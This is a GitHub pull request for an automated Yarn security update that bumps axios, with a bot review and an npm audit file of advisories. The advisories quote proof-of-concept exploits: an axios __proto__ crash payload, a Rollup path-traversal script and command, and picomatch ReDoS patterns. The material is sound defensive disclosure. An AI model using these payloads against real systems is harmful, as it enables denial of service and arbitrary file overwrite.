Skip to content

chore(deps): Update Yarn dependencies (security-updates)#435

Closed
nielsdrost7 wants to merge 1 commit intodevelopfrom
automated/yarn-update-25
Closed

chore(deps): Update Yarn dependencies (security-updates)#435
nielsdrost7 wants to merge 1 commit intodevelopfrom
automated/yarn-update-25

Conversation

@nielsdrost7
Copy link
Copy Markdown
Collaborator

@nielsdrost7 nielsdrost7 commented Mar 30, 2026
edited by coderabbitai bot
Loading

Yarn Dependency Update

This PR updates Yarn (npm) dependencies.

Update Type: security-updates
Triggered by: schedule

Lock File Status

✓ No lock file conflicts detected.

Updated Packages

╔═══════════════════════════════════════════════════════════════╗
║                    Package Update Report                     ║
╚═══════════════════════════════════════════════════════════════╝

📦 DIRECT DEPENDENCIES (from package.json)
─────────────────────────────────────────────────────────────────

  ✓ axios
    1.13.2 → 1.14.0


🔗 TRANSITIVE DEPENDENCIES (dependencies of dependencies)
─────────────────────────────────────────────────────────────────

  └─ proxy-from-env
     1.1.0 → 2.1.0


═════════════════════════════════════════════════════════════════
SUMMARY: 1 direct, 1 transitive (2 total)
═════════════════════════════════════════════════════════════════

Checks Performed

  • Assets built successfully
  • Dependencies installed and verified
  • Lock file conflicts checked

Security Audit

8 security vulnerabilities detected. Please review audit-report.json.

Review Checklist

  • Review updated packages and their changelogs
  • Verify assets build correctly
  • Check for breaking changes in frontend
  • Test UI changes in development environment
  • Verify no console errors in browser

This PR was automatically created by the Yarn Update workflow.

Summary by CodeRabbit

  • Bug Fixes

    • Resolved security audit findings for axios and build-related dependencies

  • Chores

    • Updated axios development dependency to version 1.14.0
    • Updated transitive dependency versions
    • Refreshed security audit documentation with updated vulnerability records

@coderabbitai
Copy link
Copy Markdown
Contributor

coderabbitai bot commented Mar 30, 2026
edited
Loading

📝 Walkthrough

Walkthrough

This PR updates security audit records to document identified vulnerabilities in dependencies (axios, rollup, picomatch) with their resolution details, bumps the axios devDependency from version 1.13.2 to 1.14.0, and refreshes the package update report to reflect npm packages rather than composer packages.

Changes

Cohort / File(s) Summary
Security Audit Records
audit-before.json, audit-report.json		 Added and structured multiple vulnerability advisories for axios (DoS via __proto__), rollup (arbitrary file write), and picomatch (method injection, ReDoS); appended audit summary with aggregate vulnerability counts (moderate: 3, high: 5) and dependency total (156).
Dependency Updates
package.json, updated-packages.txt		 Updated axios devDependency from ^1.13.2 to ^1.14.0; refreshed package update report to document direct dependency update (axios) and transitive dependency update (proxy-from-env), replacing prior composer-based report with npm-focused format.

Estimated code review effort

🎯 2 (Simple) | ⏱️ ~12 minutes

Possibly related PRs

Poem

🐰 Hops through the audits with glee so bright,
Security records now shining in light,
Axios leaps forward to version new,
Dependencies tracked, vulnerabilities true! 🔐

🚥 Pre-merge checks | ✅ 3
✅ Passed checks (3 passed)
Check name Status Explanation
Description Check ✅ Passed Check skipped - CodeRabbit’s high-level summary is enabled.
Title check ✅ Passed The title 'chore(deps): Update Yarn dependencies (security-updates)' directly corresponds to the main changes: updating npm/Yarn dependencies with security fixes, specifically axios and transitive dependencies.
Docstring Coverage ✅ Passed No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.

✏️ Tip: You can configure your own custom pre-merge checks in the settings.

✨ Finishing Touches
🧪 Generate unit tests (beta)
  • Create PR with unit tests
  • Commit unit tests in branch automated/yarn-update-25

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

Comment @coderabbitai help to get the list of available commands and usage tips.

coderabbitai[bot]
coderabbitai bot reviewed Mar 30, 2026
View reviewed changes
Copy link
Copy Markdown
Contributor

@coderabbitai coderabbitai bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 2

🤖 Prompt for all review comments with AI agents 
Verify each finding against the current code and only fix it if needed.

Inline comments:
In `@audit-before.json`:
- Around line 1-9: audit-before.json and audit-report.json contain
line-delimited JSON (NDJSON) but are named/treated as regular JSON causing lint
errors; convert them to proper NDJSON or valid JSON: either rename both files to
.ndjson or .jsonl (audit-before.ndjson, audit-report.ndjson) and update any
references, or wrap the newline-delimited records into a single JSON array;
alternatively add an exclusion for these filenames in the JSON lint/Biome config
so they are not parsed as JSON. Ensure you apply the same change for both
audit-before.json and audit-report.json and update any CI/README references so
tooling continues to find them.

In `@audit-report.json`:
- Around line 1-9: The audit-report.json contains a stale advisory for axios
(CVE-2026-25639 referencing version 1.13.2) even though yarn.lock pins
axios@^1.14.0; regenerate the audit from the current lockfile by re-running the
project audit command (e.g., npm/yarn audit or your audit tooling) using the
current yarn.lock, confirm axios resolves to >=1.13.5 (1.14.0) and that the
CVE-2026-25639 entry is gone, then replace audit-report.json with the
regenerated report and commit the updated audit-report.json and yarn.lock
together to ensure consistency.
🪄 Autofix (Beta)

Fix all unresolved CodeRabbit comments on this PR:

  • Push a commit to this branch (recommended)
  • Create a new PR with the fixes
ℹ️ Review info
⚙️ Run configuration

Configuration used: defaults

Review profile: CHILL

Plan: Pro

Run ID: f78f87b8-8240-4ead-9a43-07068fd18bf6

📥 Commits

Reviewing files that changed from the base of the PR and between cc00605 and 3959f88.

⛔ Files ignored due to path filters (1)
  • yarn.lock is excluded by !**/yarn.lock, !**/*.lock
📒 Files selected for processing (4)
  • audit-before.json
  • audit-report.json
  • package.json
  • updated-packages.txt

audit-before.json
Comment on lines +1 to +9
{"type":"auditAdvisory","data":{"resolution":{"id":1113275,"path":"axios","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"1.13.2","paths":["axios"]}],"found_by":null,"deleted":null,"references":"- https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433\n- https://github.com/axios/axios/pull/7369\n- https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57\n- https://github.com/axios/axios/releases/tag/v1.13.5\n- https://nvd.nist.gov/vuln/detail/CVE-2026-25639\n- https://github.com/axios/axios/pull/7388\n- https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e\n- https://github.com/axios/axios/releases/tag/v0.30.3\n- https://github.com/advisories/GHSA-43fc-jf86-j433","created":"2026-02-09T17:46:14.000Z","id":1113275,"npm_advisory_id":null,"overview":"# Denial of Service via **proto** Key in mergeConfig\n\n### Summary\n\nThe `mergeConfig` function in axios crashes with a TypeError when processing configuration objects containing `__proto__` as an own property. An attacker can trigger this by providing a malicious configuration object created via `JSON.parse()`, causing complete denial of service.\n\n### Details\n\nThe vulnerability exists in `lib/core/mergeConfig.js` at lines 98-101:\n\n```javascript\nutils.forEach(Object.keys({ ...config1, ...config2 }), function computeConfigValue(prop) {\n const merge = mergeMap[prop] || mergeDeepProperties;\n const configValue = merge(config1[prop], config2[prop], prop);\n (utils.isUndefined(configValue) && merge !== mergeDirectKeys) || (config[prop] = configValue);\n});\n```\n\nWhen `prop` is `'__proto__'`:\n\n1. `JSON.parse('{\"__proto__\": {...}}')` creates an object with `__proto__` as an own enumerable property\n2. `Object.keys()` includes `'__proto__'` in the iteration\n3. `mergeMap['__proto__']` performs prototype chain lookup, returning `Object.prototype` (truthy object)\n4. The expression `mergeMap[prop] || mergeDeepProperties` evaluates to `Object.prototype`\n5. `Object.prototype(...)` throws `TypeError: merge is not a function`\n\nThe `mergeConfig` function is called by:\n\n- `Axios._request()` at `lib/core/Axios.js:75`\n- `Axios.getUri()` at `lib/core/Axios.js:201`\n- All HTTP method shortcuts (`get`, `post`, etc.) at `lib/core/Axios.js:211,224`\n\n### PoC\n\n```javascript\nimport axios from \"axios\";\n\nconst maliciousConfig = JSON.parse('{\"__proto__\": {\"x\": 1}}');\nawait axios.get(\"https://httpbin.org/get\", maliciousConfig);\n```\n\n**Reproduction steps:**\n\n1. Clone axios repository or `npm install axios`\n2. Create file `poc.mjs` with the code above\n3. Run: `node poc.mjs`\n4. Observe the TypeError crash\n\n**Verified output (axios 1.13.4):**\n\n```\nTypeError: merge is not a function\n at computeConfigValue (lib/core/mergeConfig.js:100:25)\n at Object.forEach (lib/utils.js:280:10)\n at mergeConfig (lib/core/mergeConfig.js:98:9)\n```\n\n**Control tests performed:**\n| Test | Config | Result |\n|------|--------|--------|\n| Normal config | `{\"timeout\": 5000}` | SUCCESS |\n| Malicious config | `JSON.parse('{\"__proto__\": {\"x\": 1}}')` | **CRASH** |\n| Nested object | `{\"headers\": {\"X-Test\": \"value\"}}` | SUCCESS |\n\n**Attack scenario:**\nAn application that accepts user input, parses it with `JSON.parse()`, and passes it to axios configuration will crash when receiving the payload `{\"__proto__\": {\"x\": 1}}`.\n\n### Impact\n\n**Denial of Service** - Any application using axios that processes user-controlled JSON and passes it to axios configuration methods is vulnerable. The application will crash when processing the malicious payload.\n\nAffected environments:\n\n- Node.js servers using axios for HTTP requests\n- Any backend that passes parsed JSON to axios configuration\n\nThis is NOT prototype pollution - the application crashes before any assignment occurs.","reported_by":null,"title":"Axios is Vulnerable to Denial of Service via __proto__ Key in mergeConfig","metadata":null,"cves":["CVE-2026-25639"],"access":"public","severity":"high","module_name":"axios","vulnerable_versions":">=1.0.0 <=1.13.4","github_advisory_id":"GHSA-43fc-jf86-j433","recommendation":"Upgrade to version 1.13.5 or later","patched_versions":">=1.13.5","updated":"2026-02-18T17:16:29.000Z","cvss":{"score":7.5,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},"cwe":["CWE-754"],"url":"https://github.com/advisories/GHSA-43fc-jf86-j433"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1113515,"path":"vite>rollup","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"4.54.0","paths":["vite>rollup"]}],"found_by":null,"deleted":null,"references":"- https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc\n- https://nvd.nist.gov/vuln/detail/CVE-2026-27606\n- https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2\n- https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e\n- https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3\n- https://github.com/rollup/rollup/releases/tag/v2.80.0\n- https://github.com/rollup/rollup/releases/tag/v3.30.0\n- https://github.com/rollup/rollup/releases/tag/v4.59.0\n- https://github.com/advisories/GHSA-mw96-cpmx-2vgc","created":"2026-02-25T22:37:26.000Z","id":1113515,"npm_advisory_id":null,"overview":"### Summary\nThe Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (`../`) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files.\n\n### Details\nThe vulnerability is caused by the combination of two flawed components in the Rollup core:\n\n1. **Improper Sanitization**: In `src/utils/sanitizeFileName.ts`, the `INVALID_CHAR_REGEX` used to clean user-provided names for chunks and assets excludes the period (`.`) and forward/backward slashes (`/`, `\\`). \n ```typescript\n // src/utils/sanitizeFileName.ts (Line 3)\n const INVALID_CHAR_REGEX = /[\\u0000-\\u001F\"#$%&*+,:;<=>?[\\]^`{|}\\u007F]/g;\n ```\n This allows path traversal sequences like `../../` to pass through the sanitizer unmodified.\n\n2. **Unsafe Path Resolution**: In `src/rollup/rollup.ts`, the `writeOutputFile` function uses `path.resolve` to combine the output directory with the \"sanitized\" filename.\n ```typescript\n // src/rollup/rollup.ts (Line 317)\n const fileName = resolve(outputOptions.dir || dirname(outputOptions.file!), outputFile.fileName);\n ```\n Because `path.resolve` follows the `../` sequences in `outputFile.fileName`, the resulting path points outside of the intended output directory. The subsequent call to `fs.writeFile` completes the arbitrary write.\n\n### PoC\nA demonstration of this vulnerability can be performed using the Rollup CLI or a configuration file.\n\n**Scenario: CLI Named Input Exploit**\n1. Target a sensitive file location (for demonstration, we will use a file in the project root called `pwned.js`).\n2. Execute Rollup with a specifically crafted named input where the key contains traversal characters:\n ```bash\n rollup --input \"a/../../pwned.js=main.js\" --dir dist\n ```\n3. **Result**: Rollup will resolve the output path for the entry chunk as `dist + a/../../pwned.js`, which resolves to the project root. The file `pwned.js` is created/overwritten outside the `dist` folder.\n\n**Reproduction Files provided :**\n* `vuln_app.js`: Isolated logic exactly replicating the sanitization and resolution bug.\n* `exploit.py`: Automated script to run the PoC and verify the file escape.\n\nvuln_app.js\n```js\nconst path = require('path');\nconst fs = require('fs');\n\n/**\n * REPLICATED ROLLUP VULNERABILITY\n * \n * 1. Improper Sanitization (from src/utils/sanitizeFileName.ts)\n * 2. Unsafe Path Resolution (from src/rollup/rollup.ts)\n */\n\nfunction sanitize(name) {\n // The vulnerability: Rollup's regex fails to strip dots and slashes, \n // allowing path traversal sequences like '../'\n return name.replace(/[\\u0000-\\u001F\"#$%&*+,:;<=>?[\\]^`{|}\\u007F]/g, '_');\n}\n\nasync function build(userSuppliedName) {\n const outputDir = path.join(__dirname, 'dist');\n const fileName = sanitize(userSuppliedName);\n\n // Vulnerability: path.resolve() follows traversal sequences in the filename\n const outputPath = path.resolve(outputDir, fileName);\n\n console.log(`[*] Target write path: ${outputPath}`);\n\n if (!fs.existsSync(path.dirname(outputPath))) {\n fs.mkdirSync(path.dirname(outputPath), { recursive: true });\n }\n\n fs.writeFileSync(outputPath, 'console.log(\"System Compromised!\");');\n console.log(`[+] File written successfully.`);\n}\n\nbuild(process.argv[2] || 'bundle.js');\n\n```\n\nexploit.py\n```py\nimport subprocess\nfrom pathlib import Path\n\ndef run_poc():\n # Target a file outside the 'dist' folder\n poc_dir = Path(__file__).parent\n malicious_filename = \"../pwned_by_rollup.js\"\n target_path = poc_dir / \"pwned_by_rollup.js\"\n\n print(f\"=== Rollup Path Traversal PoC ===\")\n print(f\"[*] Malicious Filename: {malicious_filename}\")\n \n # Trigger the vulnerable app\n subprocess.run([\"node\", \"poc/vuln_app.js\", malicious_filename])\n\n if target_path.exists():\n print(f\"[SUCCESS] File escaped 'dist' folder!\")\n print(f\"[SUCCESS] Created: {target_path}\")\n # target_path.unlink() # Cleanup\n else:\n print(\"[FAILED] Exploit did not work.\")\n\nif __name__ == \"__main__\":\n run_poc()\n```\n\n## POC \n```rollup --input \"bypass/../../../../../../../Users/vaghe/OneDrive/Desktop/pwned_desktop.js=main.js\" --dir dist```\n\n<img width=\"1918\" height=\"1111\" alt=\"image\" src=\"https://github.com/user-attachments/assets/3474eb7c-9c4b-4acd-9103-c70596b490d4\" />\n\n\n\n### Impact\nThis is a **High** level of severity vulnerability.\n* **Arbitrary File Write**: Attackers can overwrite sensitive files like `~/.ssh/authorized_keys`, `.bashrc`, or system binaries if the build process has sufficient privileges.\n* **Supply Chain Risk**: Malicious third-party plugins or dependencies can use this to inject malicious code into other parts of a developer's machine during the build phase.\n* **User Impact**: Developers running builds on untrusted repositories are at risk of system compromise.","reported_by":null,"title":"Rollup 4 has Arbitrary File Write via Path Traversal","metadata":null,"cves":["CVE-2026-27606"],"access":"public","severity":"high","module_name":"rollup","vulnerable_versions":">=4.0.0 <4.59.0","github_advisory_id":"GHSA-mw96-cpmx-2vgc","recommendation":"Upgrade to version 4.59.0 or later","patched_versions":">=4.59.0","updated":"2026-02-25T22:37:27.000Z","cvss":{"score":0,"vectorString":null},"cwe":["CWE-22"],"url":"https://github.com/advisories/GHSA-mw96-cpmx-2vgc"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1115551,"path":"vite>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"4.0.3","paths":["vite>picomatch","vite>tinyglobby>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\n- https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33672\n- https://github.com/advisories/GHSA-3v7f-55p6-f55p","created":"2026-03-25T21:13:39.000Z","id":1115551,"npm_advisory_id":null,"overview":"### Impact\npicomatch is vulnerable to a **method injection vulnerability (CWE-1321)** affecting the `POSIX_REGEX_SOURCE` object. Because the object inherits from `Object.prototype`, specially crafted POSIX bracket expressions (e.g., `[[:constructor:]]`) can reference inherited method names. These methods are implicitly converted to strings and injected into the generated regular expression.\n\nThis leads to **incorrect glob matching behavior (integrity impact)**, where patterns may match unintended filenames. The issue does **not enable remote code execution**, but it can cause security-relevant logic errors in applications that rely on glob matching for filtering, validation, or access control.\n\nAll users of affected `picomatch` versions that process untrusted or user-controlled glob patterns are potentially impacted.\n\n### Patches\n\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\n\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to picomatch.\n\nPossible mitigations include:\n- Sanitizing or rejecting untrusted glob patterns, especially those containing POSIX character classes like `[[:...:]]`.\n- Avoiding the use of POSIX bracket expressions if user input is involved.\n- Manually patching the library by modifying `POSIX_REGEX_SOURCE` to use a null prototype:\n\n ```js\n const POSIX_REGEX_SOURCE = {\n __proto__: null,\n alnum: 'a-zA-Z0-9',\n alpha: 'a-zA-Z',\n // ... rest unchanged\n };\n \n### Resources\n\n- fix for similar issue: https://github.com/micromatch/picomatch/pull/144\n- picomatch repository https://github.com/micromatch/picomatch","reported_by":null,"title":"Picomatch: Method Injection in POSIX Character Classes causes incorrect Glob Matching","metadata":null,"cves":["CVE-2026-33672"],"access":"public","severity":"moderate","module_name":"picomatch","vulnerable_versions":">=4.0.0 <4.0.4","github_advisory_id":"GHSA-3v7f-55p6-f55p","recommendation":"Upgrade to version 4.0.4 or later","patched_versions":">=4.0.4","updated":"2026-03-27T21:36:25.000Z","cvss":{"score":5.3,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},"cwe":["CWE-1321"],"url":"https://github.com/advisories/GHSA-3v7f-55p6-f55p"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1115551,"path":"vite>tinyglobby>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"4.0.3","paths":["vite>picomatch","vite>tinyglobby>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\n- https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33672\n- https://github.com/advisories/GHSA-3v7f-55p6-f55p","created":"2026-03-25T21:13:39.000Z","id":1115551,"npm_advisory_id":null,"overview":"### Impact\npicomatch is vulnerable to a **method injection vulnerability (CWE-1321)** affecting the `POSIX_REGEX_SOURCE` object. Because the object inherits from `Object.prototype`, specially crafted POSIX bracket expressions (e.g., `[[:constructor:]]`) can reference inherited method names. These methods are implicitly converted to strings and injected into the generated regular expression.\n\nThis leads to **incorrect glob matching behavior (integrity impact)**, where patterns may match unintended filenames. The issue does **not enable remote code execution**, but it can cause security-relevant logic errors in applications that rely on glob matching for filtering, validation, or access control.\n\nAll users of affected `picomatch` versions that process untrusted or user-controlled glob patterns are potentially impacted.\n\n### Patches\n\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\n\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to picomatch.\n\nPossible mitigations include:\n- Sanitizing or rejecting untrusted glob patterns, especially those containing POSIX character classes like `[[:...:]]`.\n- Avoiding the use of POSIX bracket expressions if user input is involved.\n- Manually patching the library by modifying `POSIX_REGEX_SOURCE` to use a null prototype:\n\n ```js\n const POSIX_REGEX_SOURCE = {\n __proto__: null,\n alnum: 'a-zA-Z0-9',\n alpha: 'a-zA-Z',\n // ... rest unchanged\n };\n \n### Resources\n\n- fix for similar issue: https://github.com/micromatch/picomatch/pull/144\n- picomatch repository https://github.com/micromatch/picomatch","reported_by":null,"title":"Picomatch: Method Injection in POSIX Character Classes causes incorrect Glob Matching","metadata":null,"cves":["CVE-2026-33672"],"access":"public","severity":"moderate","module_name":"picomatch","vulnerable_versions":">=4.0.0 <4.0.4","github_advisory_id":"GHSA-3v7f-55p6-f55p","recommendation":"Upgrade to version 4.0.4 or later","patched_versions":">=4.0.4","updated":"2026-03-27T21:36:25.000Z","cvss":{"score":5.3,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},"cwe":["CWE-1321"],"url":"https://github.com/advisories/GHSA-3v7f-55p6-f55p"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1115554,"path":"vite>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"4.0.3","paths":["vite>picomatch","vite>tinyglobby>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\n- https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33671\n- https://github.com/advisories/GHSA-c2c7-rcm5-vvqj","created":"2026-03-25T21:12:07.000Z","id":1115554,"npm_advisory_id":null,"overview":"### Impact\n`picomatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input.\n\nExamples of problematic patterns include `+(a|aa)`, `+(*|?)`, `+(+(a))`, `*(+(a))`, and `+(+(+(a)))`. In local reproduction, these patterns caused multi-second event-loop blocking with relatively short inputs. For example, `+(a|aa)` compiled to `^(?:(?=.)(?:a|aa)+)$` and took about 2 seconds to reject a 41-character non-matching input, while nested patterns such as `+(+(a))` and `*(+(a))` took around 29 seconds to reject a 33-character input on a modern M1 MacBook.\n\nApplications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way.\n\n### Patches\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`.\n\nPossible mitigations include:\n- disable extglob support for untrusted patterns by using `noextglob: true`\n- reject or sanitize patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`\n- enforce strict allowlists for accepted pattern syntax\n- run matching in an isolated worker or separate process with time and resource limits\n- apply application-level request throttling and input validation for any endpoint that accepts glob patterns\n\n### Resources\n- Picomatch repository: https://github.com/micromatch/picomatch\n- `lib/parse.js` and `lib/constants.js` are involved in generating the vulnerable regex forms\n- Comparable ReDoS precedent: CVE-2024-4067 (`micromatch`)\n- Comparable generated-regex precedent: CVE-2024-45296 (`path-to-regexp`)","reported_by":null,"title":"Picomatch has a ReDoS vulnerability via extglob quantifiers","metadata":null,"cves":["CVE-2026-33671"],"access":"public","severity":"high","module_name":"picomatch","vulnerable_versions":">=4.0.0 <4.0.4","github_advisory_id":"GHSA-c2c7-rcm5-vvqj","recommendation":"Upgrade to version 4.0.4 or later","patched_versions":">=4.0.4","updated":"2026-03-27T21:36:14.000Z","cvss":{"score":7.5,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},"cwe":["CWE-1333"],"url":"https://github.com/advisories/GHSA-c2c7-rcm5-vvqj"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1115554,"path":"vite>tinyglobby>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"4.0.3","paths":["vite>picomatch","vite>tinyglobby>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\n- https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33671\n- https://github.com/advisories/GHSA-c2c7-rcm5-vvqj","created":"2026-03-25T21:12:07.000Z","id":1115554,"npm_advisory_id":null,"overview":"### Impact\n`picomatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when processing crafted extglob patterns. Certain patterns using extglob quantifiers such as `+()` and `*()`, especially when combined with overlapping alternatives or nested extglobs, are compiled into regular expressions that can exhibit catastrophic backtracking on non-matching input.\n\nExamples of problematic patterns include `+(a|aa)`, `+(*|?)`, `+(+(a))`, `*(+(a))`, and `+(+(+(a)))`. In local reproduction, these patterns caused multi-second event-loop blocking with relatively short inputs. For example, `+(a|aa)` compiled to `^(?:(?=.)(?:a|aa)+)$` and took about 2 seconds to reject a 41-character non-matching input, while nested patterns such as `+(+(a))` and `*(+(a))` took around 29 seconds to reject a 33-character input on a modern M1 MacBook.\n\nApplications are impacted when they allow untrusted users to supply glob patterns that are passed to `picomatch` for compilation or matching. In those cases, an attacker can cause excessive CPU consumption and block the Node.js event loop, resulting in a denial of service. Applications that only use trusted, developer-controlled glob patterns are much less likely to be exposed in a security-relevant way.\n\n### Patches\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to `picomatch`.\n\nPossible mitigations include:\n- disable extglob support for untrusted patterns by using `noextglob: true`\n- reject or sanitize patterns containing nested extglobs or extglob quantifiers such as `+()` and `*()`\n- enforce strict allowlists for accepted pattern syntax\n- run matching in an isolated worker or separate process with time and resource limits\n- apply application-level request throttling and input validation for any endpoint that accepts glob patterns\n\n### Resources\n- Picomatch repository: https://github.com/micromatch/picomatch\n- `lib/parse.js` and `lib/constants.js` are involved in generating the vulnerable regex forms\n- Comparable ReDoS precedent: CVE-2024-4067 (`micromatch`)\n- Comparable generated-regex precedent: CVE-2024-45296 (`path-to-regexp`)","reported_by":null,"title":"Picomatch has a ReDoS vulnerability via extglob quantifiers","metadata":null,"cves":["CVE-2026-33671"],"access":"public","severity":"high","module_name":"picomatch","vulnerable_versions":">=4.0.0 <4.0.4","github_advisory_id":"GHSA-c2c7-rcm5-vvqj","recommendation":"Upgrade to version 4.0.4 or later","patched_versions":">=4.0.4","updated":"2026-03-27T21:36:14.000Z","cvss":{"score":7.5,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},"cwe":["CWE-1333"],"url":"https://github.com/advisories/GHSA-c2c7-rcm5-vvqj"}}}
{"type":"auditAdvisory","data":{"resolution":{"id":1115549,"path":"laravel-vite-plugin>vite-plugin-full-reload>picomatch","dev":false,"optional":false,"bundled":false},"advisory":{"findings":[{"version":"2.3.1","paths":["laravel-vite-plugin>vite-plugin-full-reload>picomatch"]}],"found_by":null,"deleted":null,"references":"- https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\n- https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903\n- https://nvd.nist.gov/vuln/detail/CVE-2026-33672\n- https://github.com/advisories/GHSA-3v7f-55p6-f55p","created":"2026-03-25T21:13:39.000Z","id":1115549,"npm_advisory_id":null,"overview":"### Impact\npicomatch is vulnerable to a **method injection vulnerability (CWE-1321)** affecting the `POSIX_REGEX_SOURCE` object. Because the object inherits from `Object.prototype`, specially crafted POSIX bracket expressions (e.g., `[[:constructor:]]`) can reference inherited method names. These methods are implicitly converted to strings and injected into the generated regular expression.\n\nThis leads to **incorrect glob matching behavior (integrity impact)**, where patterns may match unintended filenames. The issue does **not enable remote code execution**, but it can cause security-relevant logic errors in applications that rely on glob matching for filtering, validation, or access control.\n\nAll users of affected `picomatch` versions that process untrusted or user-controlled glob patterns are potentially impacted.\n\n### Patches\n\nThis issue is fixed in picomatch 4.0.4, 3.0.2 and 2.3.2.\n\nUsers should upgrade to one of these versions or later, depending on their supported release line.\n\n### Workarounds\n\nIf upgrading is not immediately possible, avoid passing untrusted glob patterns to picomatch.\n\nPossible mitigations include:\n- Sanitizing or rejecting untrusted glob patterns, especially those containing POSIX character classes like `[[:...:]]`.\n- Avoiding the use of POSIX bracket expressions if user input is involved.\n- Manually patching the library by modifying `POSIX_REGEX_SOURCE` to use a null prototype:\n\n ```js\n const POSIX_REGEX_SOURCE = {\n __proto__: null,\n alnum: 'a-zA-Z0-9',\n alpha: 'a-zA-Z',\n // ... rest unchanged\n };\n \n### Resources\n\n- fix for similar issue: https://github.com/micromatch/picomatch/pull/144\n- picomatch repository https://github.com/micromatch/picomatch","reported_by":null,"title":"Picomatch: Method Injection in POSIX Character Classes causes incorrect Glob Matching","metadata":null,"cves":["CVE-2026-33672"],"access":"public","severity":"moderate","module_name":"picomatch","vulnerable_versions":"<2.3.2","github_advisory_id":"GHSA-3v7f-55p6-f55p","recommendation":"Upgrade to version 2.3.2 or later","patched_versions":">=2.3.2","updated":"2026-03-27T21:36:25.000Z","cvss":{"score":5.3,"vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},"cwe":["CWE-1321"],"url":"https://github.com/advisories/GHSA-3v7f-55p6-f55p"}}}
